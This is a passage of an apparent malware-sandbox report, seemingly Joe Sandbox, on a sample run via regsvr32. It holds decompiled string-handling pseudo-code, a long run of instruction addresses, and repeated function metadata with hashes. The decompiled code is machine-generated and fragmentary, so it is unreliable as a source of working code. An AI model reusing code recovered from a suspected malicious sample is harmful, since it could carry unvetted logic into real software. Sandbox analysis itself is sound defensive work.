											_t286[0] = 0;
											L191:
											__eflags =  *_t294 - 1;
											if( *_t294 > 1) {
												goto L39;
											}
											goto L192;
										}
										L35:
										__eflags = _t312;
										if(_t312 == 0) {
											_t445 = _a4;
											_t294 = _v32;
											goto L191;
										}
										_t286 =  &(_t286[0]);
										_t411 = _t411 + 2;
										__eflags = _t411;
									}
								}
								_t418 = 0;
								__eflags = _t316 - 1;
								if(_t316 <= 1) {
									goto L70;
								}
								_v40 = 0;
								goto L39;
							}
							L22:
							_t287 = _v64;
							while(1) {
								__eflags =  *(_t364 + _t287 * 2) & 0x0000ffff;
								if(( *(_t364 + _t287 * 2) & 0x0000ffff) == 0) {
									break;
								}
								_t287 = _t287 + 1;
								__eflags = _t287 - 0x7fffffff;
								if(_t287 < 0x7fffffff) {
									continue;
								}
								goto L25;
							}
							_v64 = _t287;
							goto L26;
						}
						asm("bsf edi, edi");
						_t445 = _a4;
						_v64 = (_t429 >> 1) + _t277;
						goto L26;
					}
					_t441 = 0;
					_v64 = 0;
					__eflags = _t277 & 0x00000001;
					if((_t277 & 0x00000001) != 0) {
						goto L22;
					}
					_t277 =  ~_t277 + 0x10 >> 1;
					__eflags = _t277;
					while(1) {
						__eflags =  *(_t364 + _t441 * 2) & 0x0000ffff;
						if(( *(_t364 + _t441 * 2) & 0x0000ffff) == 0) {
							break;
						}
						_t441 = _t441 + 1;
						__eflags = _t441 - _t277;
						if(_t441 < _t277) {
							continue;
						}
						goto L18;
					}
					_v64 = _t441;
					_t445 = _a4;
					goto L26;
				}
				_push(0x80);
				 *_t445 = 0;
				_t445[1] = 0;
				_t313 = E00471030();
				_t474 = _t473 + 4;
				_t414 =  *_t445;
				if(_t414 == 0) {
					__eflags = 0;
					 *_t313 = 0;
					L9:
					 *_t445 = _t313;
					_t445[1] = 0x40;
					goto L115;
				}
				if(_t313 == 0) {
					L7:
					_push(2);
					_push(_t414);
					E004710B0();
					_t474 = _t474 + 8;
					goto L9;
				}
				_t361 =  *_t414 & 0x0000ffff;
				 *_t313 = _t361;
				if(_t361 == 0) {
					goto L7;
				}
				_t362 = 0;
				while(1) {
					_t362 = _t362 + 1;
					_t442 =  *(_t414 + _t362 * 4 - 2) & 0x0000ffff;
					 *(_t313 + _t362 * 4 - 2) = _t442;
					if(_t442 == 0) {
						goto L7;
					}
					_t443 =  *(_t414 + _t362 * 4) & 0x0000ffff;
					 *(_t313 + _t362 * 4) = _t443;
					if(_t443 != 0) {
						continue;
					}
					goto L7;
				}
				goto L7;
			}

0x0047d039
0x0047d043
0x0047d04f
0x0047d051
0x0047d054
0x0047d058
0x0047d0c6
0x0047d0c8
0x0047d0ca
0x0047d214
0x0047d214
0x0047d21e
0x0047d220
0x0047d225
0x0047d228
0x0047d22b
0x0047d3a1
0x0047d3a3
0x0047d3a5
0x0047d3a8
0x0047d3aa
0x0047d507
0x0047d507
0x0047d511
0x0047d513
0x0047d516
0x0047d518
0x0047d51a
0x0047d554
0x0047d556
0x0047d559
0x0047d559
0x0047d55b
0x0047d562
0x0047d562
0x0047d564
0x0047d565
0x0047d56a
0x0047d56d
0x0047d56d
0x0047d573
0x0047d577
0x0047d57b
0x0047d581
0x0047d5dc
0x0047d5dc
0x0047d5de
0x0047d5df
0x0047d5e7
0x0047d5fa
0x0047d5fa
0x0047d585
0x0047d587
0x0047d8fb
0x0047d5c2
0x0047d5c7
0x0047d5c9
0x0047d5cf
0x0047d5d1
0x0047d5d3
0x0047d5d8
0x0047d5d8
0x0047d5cf
0x00000000
0x0047d5c7
0x0047d58d
0x0047d58f
0x0047d591
0x0047d591
0x0047d596
0x0047d598
0x0047d59a
0x0047d59f
0x0047d59f
0x0047d5a3
0x0047d5a9
0x0047d5ab
0x0047d5ad
0x0047d5b2
0x0047d5b2
0x0047d5b6
0x0047d5b7
0x0047d5bb
0x0047d5be
0x00000000
0x0047d5be
0x0047d51c
0x0047d51e
0x0047d547
0x0047d547
0x0047d549
0x0047d54a
0x0047d54f
0x00000000
0x0047d54f
0x0047d520
0x0047d523
0x0047d526
0x0047d528
0x00000000
0x00000000
0x0047d52a
0x0047d52a
0x0047d52c
0x0047d52c
0x0047d52d
0x0047d532
0x0047d537
0x0047d539
0x00000000
0x00000000
0x0047d53b
0x0047d53f
0x0047d543
0x0047d545
0x00000000
0x00000000
0x00000000
0x0047d545
0x00000000
0x0047d52c
0x0047d3b0
0x0047d3b3
0x0047d3b5
0x00000000
0x00000000
0x0047d3bd
0x0047d3bd
0x0047d3c0
0x0047d3dd
0x0047d3e1
0x0047d3ed
0x0047d3ed
0x0047d3f3
0x0047d3f3
0x0047d3f8
0x0047d3fc
0x0047d400
0x0047d402
0x00000000
0x00000000
0x0047d408
0x0047d40b
0x0047d40d
0x00000000
0x00000000
0x0047d40f
0x0047d415
0x0047d428
0x0047d428
0x0047d42d
0x0047d432
0x0047d432
0x0047d435
0x0047d438
0x0047d43b
0x0047d43d
0x0047d450
0x0047d453
0x0047d453
0x0047d458
0x0047d460
0x0047d460
0x0047d460
0x0047d463
0x0047d468
0x0047d472
0x0047d476
0x0047d477
0x0047d47c
0x0047d47f
0x0047d481
0x0047d483
0x0047d4c8
0x0047d4ca
0x00000000
0x0047d485
0x0047d485
0x0047d487
0x0047d4b3
0x0047d4b3
0x0047d4b5
0x0047d4b6
0x0047d4ba
0x0047d4bf
0x0047d4c3
0x0047d4cd
0x0047d4d1
0x0047d4d4
0x0047d4d6
0x0047d4d6
0x0047d4d8
0x0047d4da
0x00000000
0x00000000
0x0047d4e0
0x0047d4ea
0x0047d4ea
0x0047d4ed
0x0047d4ee
0x0047d4f1
0x0047d4f3
0x00000000
0x00000000
0x0047d4f5
0x0047d4f7
0x0047d8db
0x0047d8de
0x00000000
0x0047d8de
0x0047d4fd
0x0047d4fd
0x0047d4ff
0x0047d8e7
0x00000000
0x0047d8e7
0x0047d4e4
0x0047d4e7
0x0047d4e7
0x0047d4e7
0x0047d4ea
0x0047d489
0x0047d48c
0x0047d48f
0x0047d491
0x00000000
0x00000000
0x0047d493
0x0047d493
0x0047d495
0x0047d495
0x0047d496
0x0047d49b
0x0047d4a0
0x0047d4a2
0x00000000
0x00000000
0x0047d4a4
0x0047d4a8
0x0047d4ac
0x0047d4ae
0x00000000
0x00000000
0x00000000
0x0047d4ae
0x0047d4b0
0x00000000
0x0047d4b0
0x0047d483
0x0047d43f
0x00000000
0x00000000
0x00000000
0x00000000
0x0047d417
0x0047d417
0x0047d41b
0x0047d41d
0x00000000
0x00000000
0x0047d41f
0x0047d420
0x0047d426
0x00000000
0x00000000
0x00000000
0x0047d426
0x00000000
0x0047d417
0x0047d8ef
0x0047d8f4
0x00000000
0x0047d8f4
0x0047d3c2
0x0047d3c4
0x0047d3c7
0x00000000
0x00000000
0x0047d3ce
0x0047d3ce
0x0047d3d0
0x0047d3d0
0x0047d3d4
0x0047d3d6
0x00000000
0x00000000
0x0047d3d8
0x0047d3d9
0x0047d3db
0x00000000
0x00000000
0x00000000
0x0047d3db
0x00000000
0x0047d3d0
0x0047d231
0x0047d239
0x0047d23b
0x0047d23c
0x0047d23e
0x0047d240
0x0047d244
0x0047d246
0x0047d246
0x0047d248
0x0047d977
0x0047d924
0x0047d924
0x0047d928
0x0047d2cb
0x0047d2d0
0x0047d2d0
0x0047d2d3
0x0047d2d6
0x0047d2d9
0x0047d2dd
0x0047d368
0x0047d36d
0x0047d36f
0x0047d373
0x0047d378
0x0047d382
0x0047d384
0x0047d386
0x00000000
0x00000000
0x0047d388
0x0047d38b
0x0047d38d
0x0047d5fd
0x0047d5ff
0x00000000
0x00000000
0x0047d607
0x0047d607
0x0047d60a
0x0047d626
0x0047d62a
0x0047d636
0x0047d636
0x0047d63c
0x0047d63c
0x0047d641
0x0047d645
0x0047d649
0x0047d64b
0x00000000
0x00000000
0x0047d651
0x0047d654
0x0047d656
0x00000000
0x00000000
0x0047d658
0x0047d65e
0x0047d671
0x0047d671
0x0047d676
0x0047d676
0x0047d678
0x0047d958
0x0047d701
0x0047d701
0x0047d701
0x0047d705
0x0047d707
0x0047d730
0x0047d733
0x0047d736
0x0047d73a
0x0047d7e1
0x0047d7e1
0x0047d7e3
0x0047d7e5
0x0047d919
0x0047d919
0x0047d91d
0x0047d91f
0x0047d920
0x0047d922
0x0047d92f
0x0047d934
0x0047d936
0x00000000
0x0047d936
0x00000000
0x0047d922
0x0047d7eb
0x0047d7ee
0x0047d7ee
0x0047d7f0
0x0047d81c
0x0047d81c
0x0047d81e
0x0047d820
0x0047d829
0x0047d85c
0x0047d85c
0x0047d860
0x0047d862
0x0047d865
0x0047d866
0x0047d868
0x0047d252
0x0047d254
0x0047d254
0x0047d257
0x0047d277
0x0047d27b
0x0047d287
0x0047d287
0x0047d28d
0x0047d28d
0x0047d292
0x0047d296
0x0047d29a
0x0047d29c
0x00000000
0x00000000
0x0047d2a2
0x0047d2a5
0x0047d2a7
0x00000000
0x00000000
0x0047d2a9
0x0047d2af
0x0047d2c6
0x0047d2c6
0x00000000
0x00000000
0x00000000
0x00000000
0x0047d2b1
0x0047d2b1
0x0047d2b5
0x0047d2b7
0x00000000
0x00000000
0x0047d2bd
0x0047d2be
0x0047d2c4
0x00000000
0x00000000
0x00000000
0x0047d2c4
0x0047d8c6
0x0047d8c6
0x0047d8c9
0x0047d8d1
0x0047d8d1
0x00000000
0x0047d8c9
0x0047d96b
0x0047d970
0x00000000
0x0047d970
0x0047d259
0x0047d25b
0x0047d25d
0x00000000
0x00000000
0x0047d264
0x0047d264
0x0047d266
0x0047d266
0x0047d26a
0x0047d26c
0x00000000
0x00000000
0x0047d272
0x0047d273
0x0047d275
0x00000000
0x00000000
0x00000000
0x0047d275
0x00000000
0x0047d266
0x0047d93e
0x0047d895
0x0047d897
0x0047d899
0x00000000
0x0047d899
0x0047d82b
0x0047d82b
0x0047d833
0x0047d837
0x0047d83b
0x0047d83f
0x0047d83f
0x0047d843
0x0047d847
0x0047d849
0x00000000
0x00000000
0x0047d84b
0x0047d84b
0x0047d84f
0x0047d850
0x0047d852
0x00000000
0x00000000
0x00000000
0x0047d852
0x0047d854
0x0047d858
0x00000000
0x0047d858
0x0047d822
0x00000000
0x0047d822
0x0047d7f2
0x0047d7f6
0x0047d7f6
0x0047d7f8
0x0047d7fc
0x0047d7fc
0x0047d7fd
0x0047d804
0x0047d807
0x0047d809
0x00000000
0x00000000
0x0047d80e
0x0047d810
0x0047d812
0x00000000
0x00000000
0x00000000
0x0047d812
0x0047d814
0x0047d818
0x00000000
0x0047d818
0x0047d740
0x0047d74a
0x0047d74d
0x0047d74d
0x0047d752
0x0047d75a
0x0047d75a
0x0047d75a
0x0047d75b
0x0047d765
0x0047d76f
0x0047d773
0x0047d774
0x0047d778
0x0047d77d
0x0047d781
0x0047d783
0x0047d786
0x0047d788
0x0047d7da
0x0047d7dc
0x00000000
0x0047d78a
0x0047d78a
0x0047d78c
0x0047d7bd
0x0047d7bd
0x0047d7bf
0x0047d7c0
0x0047d7c4
0x0047d7c8
0x0047d7cd
0x0047d7d1
0x0047d7d5
0x0047d7df
0x0047d7df
0x00000000
0x0047d7df
0x0047d78e
0x0047d791
0x0047d794
0x0047d796
0x00000000
0x00000000
0x0047d798
0x0047d79c
0x0047d79c
0x0047d79e
0x0047d79e
0x0047d79f
0x0047d7a4
0x0047d7a9
0x0047d7ab
0x00000000
0x00000000
0x0047d7ad
0x0047d7b1
0x0047d7b5
0x0047d7b7
0x00000000
0x00000000
0x00000000
0x0047d7b7
0x0047d7b9
0x00000000
0x0047d7b9
0x0047d788
0x0047d709
0x0047d70b
0x0047d90e
0x0047d913
0x0047d724
0x0047d724
0x00000000
0x0047d724
0x00000000
0x0047d913
0x0047d711
0x0047d713
0x0047d716
0x0047d71b
0x00000000
0x00000000
0x0047d71d
0x00000000
0x0047d71d
0x0047d680
0x0047d680
0x0047d683
0x0047d6ac
0x0047d6b0
0x0047d6bc
0x0047d6c0
0x0047d6c0
0x0047d6c5
0x0047d6c5
0x0047d6ca
0x0047d6ce
0x0047d6d2
0x0047d6d4
0x00000000
0x00000000
0x0047d6da
0x0047d6dd
0x0047d6df
0x00000000
0x00000000
0x0047d6e1
0x0047d6e5
0x0047d6ea
0x0047d6fc
0x0047d6fc
0x00000000
0x00000000
0x00000000
0x00000000
0x0047d6ec
0x0047d6ec
0x0047d6f0
0x0047d6f2
0x00000000
0x00000000
0x0047d6f4
0x0047d6f5
0x0047d6fa
0x00000000
0x00000000
0x00000000
0x0047d6fa
0x00000000
0x0047d6ec
0x0047d948
0x0047d94b
0x0047d94d
0x0047d951
0x00000000
0x0047d951
0x0047d685
0x0047d687
0x0047d68a
0x00000000
0x00000000
0x0047d691
0x0047d691
0x0047d693
0x0047d697
0x0047d69b
0x0047d69d
0x00000000
0x00000000
0x0047d6a3
0x0047d6a4
0x0047d6a6
0x00000000
0x00000000
0x0047d6a8
0x00000000
0x0047d6a8
0x0047d905
0x00000000
0x00000000
0x00000000
0x00000000
0x0047d660
0x0047d660
0x0047d664
0x0047d666
0x00000000
0x00000000
0x0047d668
0x0047d669
0x0047d66f
0x00000000
0x00000000
0x00000000
0x0047d66f
0x00000000
0x0047d660
0x0047d95f
0x0047d964
0x00000000
0x0047d964
0x0047d60c
0x0047d60e
0x0047d610
0x00000000
0x00000000
0x0047d617
0x0047d617
0x0047d619
0x0047d619
0x0047d61d
0x0047d61f
0x00000000
0x00000000
0x0047d621
0x0047d622
0x0047d624
0x00000000
0x00000000
0x00000000
0x0047d624
0x00000000
0x0047d619
0x00000000
0x0047d38d
0x0047d2ed
0x0047d2f0
0x0047d2f0
0x0047d2f6
0x0047d2fe
0x0047d2fe
0x0047d2fe
0x0047d301
0x0047d306
0x0047d310
0x0047d314
0x0047d315
0x0047d31a
0x0047d31d
0x0047d31f
0x0047d361
0x0047d363
0x00000000
0x0047d321
0x0047d321
0x0047d323
0x0047d34c
0x0047d34c
0x0047d34e
0x0047d34f
0x0047d353
0x0047d358
0x0047d35c
0x0047d366
0x0047d366
0x00000000
0x0047d366
0x0047d325
0x0047d328
0x0047d32b
0x0047d32d
0x00000000
0x00000000
0x0047d32f
0x0047d32f
0x0047d331
0x0047d331
0x0047d332
0x0047d337
0x0047d33c
0x0047d33e
0x00000000
0x00000000
0x0047d340
0x0047d344
0x0047d348
0x0047d34a
0x00000000
0x00000000
0x00000000
0x0047d34a
0x00000000
0x0047d331
0x0047d31f
0x0047d24e
0x00000000
0x0047d393
0x0047d393
0x0047d395
0x0047d396
0x0047d396
0x0047d39e
0x00000000
0x0047d39e
0x0047d0d3
0x0047d0d5
0x00000000
0x00000000
0x0047d0dd
0x0047d0dd
0x0047d0e0
0x0047d107
0x0047d10b
0x0047d117
0x0047d117
0x0047d11d
0x0047d121
0x0047d123
0x0047d123
0x0047d128
0x0047d12c
0x0047d130
0x0047d132
0x00000000
0x00000000
0x0047d138
0x0047d13b
0x0047d13d
0x00000000
0x00000000
0x0047d13f
0x0047d143
0x0047d146
0x0047d14e
0x0047d168
0x0047d168
0x0047d170
0x0047d179
0x0047d17c
0x0047d17f
0x0047d182
0x0047d184
0x0047d1a8
0x0047d1ab
0x0047d1ab
0x0047d1b1
0x0047d1b9
0x0047d1b9
0x0047d1b9
0x0047d1bc
0x0047d1c1
0x0047d1cb
0x0047d1cf
0x0047d1d0
0x0047d1d4
0x0047d1d9
0x0047d1dd
0x0047d1e2
0x0047d1e4
0x0047d1e7
0x0047d1eb
0x0047d1f7
0x0047d1f7
0x0047d1fa
0x0047d1fb
0x0047d1fe
0x0047d200
0x00000000
0x00000000
0x0047d202
0x0047d204
0x0047d87f
0x0047d881
0x0047d884
0x0047d888
0x0047d88c
0x0047d88c
0x0047d88f
0x00000000
0x00000000
0x00000000
0x0047d88f
0x0047d20a
0x0047d20a
0x0047d20c
0x0047d8a1
0x0047d8a4
0x00000000
0x0047d8a4
0x0047d1f1
0x0047d1f4
0x0047d1f4
0x0047d1f4
0x0047d1f7
0x0047d186
0x0047d188
0x0047d18b
0x00000000
0x00000000
0x0047d191
0x00000000
0x0047d191
0x0047d150
0x0047d150
0x0047d154
0x0047d158
0x0047d15a
0x00000000
0x00000000
0x0047d160
0x0047d161
0x0047d166
0x00000000
0x00000000
0x00000000
0x0047d166
0x0047d8aa
0x00000000
0x0047d8aa
0x0047d8b3
0x0047d8ba
0x0047d8bd
0x00000000
0x0047d8bd
0x0047d0e2
0x0047d0e4
0x0047d0e8
0x0047d0ea
0x00000000
0x00000000
0x0047d0f1
0x0047d0f1
0x0047d0f3
0x0047d0f7
0x0047d0f9
0x00000000
0x00000000
0x0047d0ff
0x0047d100
0x0047d102
0x00000000
0x00000000
0x00000000
0x0047d104
0x0047d873
0x0047d877
0x00000000
0x0047d877
0x0047d05a
0x0047d061
0x0047d063
0x0047d06b
0x0047d06d
0x0047d070
0x0047d074
0x0047d0ae
0x0047d0b0
0x0047d0b3
0x0047d0b3
0x0047d0b5
0x00000000
0x0047d0b5
0x0047d078
0x0047d0a1
0x0047d0a1
0x0047d0a3
0x0047d0a4
0x0047d0a9
0x00000000
0x0047d0a9
0x0047d07a
0x0047d07d
0x0047d082
0x00000000
0x00000000
0x0047d084
0x0047d086
0x0047d086
0x0047d087
0x0047d08c
0x0047d093
0x00000000
0x00000000
0x0047d095
0x0047d099
0x0047d09f
0x00000000
0x00000000
0x00000000
0x0047d09f
0x00000000

Strings

@, xrefs: 0047D90E

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 752c5ff02bc24ceb70419a329ead1c3dab5549dfac1f6eefbc4f612475c4781f
Instruction ID: 90ef565673c9022ed7d6447a23f15cce30f1fb617fab169874176ed4b0c484bc
Opcode Fuzzy Hash: 752c5ff02bc24ceb70419a329ead1c3dab5549dfac1f6eefbc4f612475c4781f
Instruction Fuzzy Hash: 7D421971E2071187C7288E29C4412AB73F2BFD5754F29C62ED89E97395EB38DC41878A

Uniqueness

Uniqueness Score: -1.00%

Function 004889F0, Relevance: 2.0, Strings: 1, Instructions: 748COMMON

Download Yara Rule

Strings

@, xrefs: 00489229

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 890d090df5082a30348e5f74619d74015760cc1c72b8607f5a6b626b3c49c3ad
Instruction ID: 5caadb75faed62ea5e084c600a6c659b164dddf823320e0b93960103e74c574c
Opcode Fuzzy Hash: 890d090df5082a30348e5f74619d74015760cc1c72b8607f5a6b626b3c49c3ad
Instruction Fuzzy Hash: 4D42E671A047128BD724AF29C84163F72E2AFD5350B598E2FE995CB395EB38CC418399

Uniqueness

Uniqueness Score: -1.00%

Function 0047AE80, Relevance: 2.0, Strings: 1, Instructions: 719COMMON

Download Yara Rule

Strings

@, xrefs: 0047AEF0

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8b23dda31ef708b485797a559140a73a4bae187a5af7111d082972d0fb887ed3
Instruction ID: 16bcea7ca9b627801870ccc1d50882e4e37383bd2f3c9ddd3f093f55faa7c224
Opcode Fuzzy Hash: 8b23dda31ef708b485797a559140a73a4bae187a5af7111d082972d0fb887ed3
Instruction Fuzzy Hash: 4742F5716043528BC7248F29C8903BB73E2FFD5714B18C66EE8999B395E738DC51838A

Uniqueness

Uniqueness Score: -1.00%

Function 0047B6F0, Relevance: 2.0, Strings: 1, Instructions: 704COMMON

Download Yara Rule

Strings

@, xrefs: 0047B760

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 0beef277e831ee5b6f040fee2b591ecf537cd5d41fbc7949637f2daeaf3f676f
Instruction ID: d6e4e7bf2e6ba5b50aa74627e11d937f1ddd90c680a2c6aed9eccf01d67f429f
Opcode Fuzzy Hash: 0beef277e831ee5b6f040fee2b591ecf537cd5d41fbc7949637f2daeaf3f676f
Instruction Fuzzy Hash: 2532D8B56047128BC7248F29C4817AB72E2FFD4710F18C62EE99987395EB38D845C7DA

Uniqueness

Uniqueness Score: -1.00%

Function 0047A660, Relevance: 1.9, Strings: 1, Instructions: 690COMMON

Download Yara Rule

Strings

@, xrefs: 0047A6CE

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: ae6b3e210800e4c3dadabf5ebb6fe57ad04fee7b8c08fcbeb00b4035cedc0044
Instruction ID: 55558d49077593a3941c45295b930dd1fef7e9ee1527ef81b2e820989835d9e4
Opcode Fuzzy Hash: ae6b3e210800e4c3dadabf5ebb6fe57ad04fee7b8c08fcbeb00b4035cedc0044
Instruction Fuzzy Hash: CF32C471A047128BC7248F29C45016FB3E2BFD4714B29C62EE99997394EB39DC66C34B

Uniqueness

Uniqueness Score: -1.00%

Function 00481EB0, Relevance: 1.9, Strings: 1, Instructions: 682COMMON

Download Yara Rule

Strings

@, xrefs: 00481F18

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 73f22bc3af338c376e1a23e00c2844d1b588c229ff9a55b9cec960deeffedffd
Instruction ID: ee595c0b7aeff282991e55841a8beb24644c4a6d3052073d829a973d6fa0d463
Opcode Fuzzy Hash: 73f22bc3af338c376e1a23e00c2844d1b588c229ff9a55b9cec960deeffedffd
Instruction Fuzzy Hash: 00324A71A083925BD715DA29C58032FBBD27FC6300F188A6FE9959B395D7BCC842C746

Uniqueness

Uniqueness Score: -1.00%

Function 004826B0, Relevance: 1.9, Strings: 1, Instructions: 653COMMON

Download Yara Rule

Strings

@, xrefs: 00482718

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 933df8fe11205ce58da33e9f299d6ed847c0e435b40f8ebfae3a0afc1ac406fd
Instruction ID: 57dc78c5c7484fb02107cde755791ab736d0424f7a0a84d261daf0db426d3a2c
Opcode Fuzzy Hash: 933df8fe11205ce58da33e9f299d6ed847c0e435b40f8ebfae3a0afc1ac406fd
Instruction Fuzzy Hash: B3324C70A093924BD725AE29C68033F7BD27FC5310F1D8E6FD8955B391DAB88D41878A

Uniqueness

Uniqueness Score: -1.00%

Function 00481730, Relevance: 1.9, Strings: 1, Instructions: 649COMMON

Download Yara Rule

Strings

@, xrefs: 00481798

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: a8b937767d9d941c8a342fb20a13b9f32eeb100c99e286f27a39f05552e35147
Instruction ID: a85ace74e7fa160bb7fe5a8242a6ec50cf296ead311722341f807eaa15d3e8f2
Opcode Fuzzy Hash: a8b937767d9d941c8a342fb20a13b9f32eeb100c99e286f27a39f05552e35147
Instruction Fuzzy Hash: 05323C70A083924BD715AA29C48032F7BDA6FD6310F188E6FD8958F376DA7C9943C746

Uniqueness

Uniqueness Score: -1.00%

Function 00469E70, Relevance: 1.8, Strings: 1, Instructions: 591COMMON

Download Yara Rule

Strings

@, xrefs: 0046A513

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: a12d0a052a07397c87e1468dda0d88e40656bd152e545f1dfbc85277f1fbb3e1
Instruction ID: b523f3e30835eb090a2a60dd5db53964bac34fbca3c571e9c9c5ae93fb9164e0
Opcode Fuzzy Hash: a12d0a052a07397c87e1468dda0d88e40656bd152e545f1dfbc85277f1fbb3e1
Instruction Fuzzy Hash: BA3220711187449BD775FF21C852BEFB3A5AF90308F004C2EA28A57192EF796909CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00484CA0, Relevance: 1.6, Strings: 1, Instructions: 358COMMON

Download Yara Rule

Strings

, xrefs: 00484CAC

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3688684798
Opcode ID: 99d3ab4eec3cde6ce4c74a6857f394d08c1cbea1aea7f723e6a4736c2bf3e63b
Instruction ID: 92388c8547fe59e663a3a9e2690490a840d35327feb1c3eeb7a84d73c63fe9e0
Opcode Fuzzy Hash: 99d3ab4eec3cde6ce4c74a6857f394d08c1cbea1aea7f723e6a4736c2bf3e63b
Instruction Fuzzy Hash: 83B16C3590979346D7256A3C889033F6AC26FD3304F2DCF6FD9954B396DA3D8842838A

Uniqueness

Uniqueness Score: -1.00%

Function 00466AD0, Relevance: .9, Instructions: 932COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ac87babf8389d11ce2844c07e7865d8a3f5b7aa4b07887840be8a69192f2a4f
Instruction ID: 138473eef91bdbe9a842ecc40cd3dc3336c11e0b3857a42dcd5fb2574e7f98a4
Opcode Fuzzy Hash: 7ac87babf8389d11ce2844c07e7865d8a3f5b7aa4b07887840be8a69192f2a4f
Instruction Fuzzy Hash: 1B8261301183409BD735FB21C891BEFB3E5AF94308F148D2FB59A561A1EF786905CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004850A0, Relevance: .8, Instructions: 835COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8132493ed869d81ea9f5ab984da2c4f4fcac5c189bdde6216712a0318459efd1
Instruction ID: 16d58d77c1d80203109f2e976f07aba231e7c09315ebc5868067701e7609fc63
Opcode Fuzzy Hash: 8132493ed869d81ea9f5ab984da2c4f4fcac5c189bdde6216712a0318459efd1
Instruction Fuzzy Hash: 0D621770608B429BD715AF29C48071FBBE2BFC5350F18CA6EE8958B351EB79C841CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00475B60, Relevance: .8, Instructions: 810COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92f3c58bd4f5dcf48150887ba14ec11a9a25b730b9d7c16da97923fd944b5a99
Instruction ID: 15bb100814ea987043b4746fd92f852bf4365cb9d95b260ef406fdcf01f3e6e8
Opcode Fuzzy Hash: 92f3c58bd4f5dcf48150887ba14ec11a9a25b730b9d7c16da97923fd944b5a99
Instruction Fuzzy Hash: 4A52C5315047019BD724EB25C881BEF73A6AF90308F15C92FA45D97292EF78DD05CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00487FC0, Relevance: .7, Instructions: 711COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c76acd60678bb96f26b5e0d37bd27300dfdf6a640e895f3b9d1efbfc3318f078
Instruction ID: 5802bf4b542ebba1facee4854e8df64501bcf450f1b287fc1d315b8e9151f485
Opcode Fuzzy Hash: c76acd60678bb96f26b5e0d37bd27300dfdf6a640e895f3b9d1efbfc3318f078
Instruction Fuzzy Hash: FD322B719087924BD721AE39888032F77D16F86710F698E6FD8959B391EF39CC428786

Uniqueness

Uniqueness Score: -1.00%

Function 00478EF0, Relevance: .7, Instructions: 697COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
